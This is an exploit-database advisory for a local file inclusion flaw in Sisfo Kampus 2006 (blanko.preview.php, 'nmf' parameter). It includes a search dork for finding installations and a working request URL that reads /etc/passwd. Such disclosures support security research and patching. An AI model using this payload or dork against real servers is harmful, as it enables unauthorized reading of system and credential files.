Sisfo Kampus 2006 (blanko.preview.php) Local File Inclusion Vulnerability

vendor:

Sisfo Kampus 2006

by:

QTRinux

N/A

CVSS

N/A

Local File Inclusion

CWE

Product Name: Sisfo Kampus 2006

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

Sisfo Kampus 2006 (blanko.preview.php) Local File Inclusion Vulnerability

The Sisfo Kampus 2006 application is vulnerable to a local file inclusion vulnerability. This vulnerability allows an attacker to include arbitrary local files by manipulating the 'nmf' parameter in the 'blanko.preview.php' script. By exploiting this vulnerability, an attacker can read sensitive files, such as the '/etc/passwd' file.

Mitigation:

Unknown

Source

Exploit-DB raw data:

              *****************************************QTRinux**************************************
|                       Sisfo Kampus 2006 (blanko.preview.php) Local File Inclusion Vulnerability
|                                                        Discovered by QTRinux|                                                                                                           www.root-qtr.com|                                                          Qatar Security t34m
| Vendor: http://www.sisfokampus.net/
 
| DorK : Powered by Sisfo Kampus 2006
 
| Exploit: http://[h0sT]/[dir]/blanko.preview.php?nmf=/etc/passwd
 
| Greetings: ( AlQaTaR! . MR.SH4R3S . Mo0oTeC  . MaZaG! ) ;
 
 
               *************************************************************************************

# milw0rm.com [2007-09-08]